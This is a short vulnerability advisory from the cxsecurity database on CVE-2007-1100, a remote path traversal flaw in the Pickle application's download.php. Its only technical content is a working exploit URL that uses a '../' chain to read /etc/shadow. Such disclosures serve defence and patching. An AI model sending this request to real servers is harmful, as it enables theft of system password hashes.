Bug: pickle download local file ( Ascii Version )

Search:
WLB2

pickle download local file

Published
Credit
Risk
2007.02.28
laurent gaffié
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-1100
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.8/10
6.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
None
None

download local file :
/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../
../etc/shadow&rotation=0&img=0

regards laurent gaffié

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version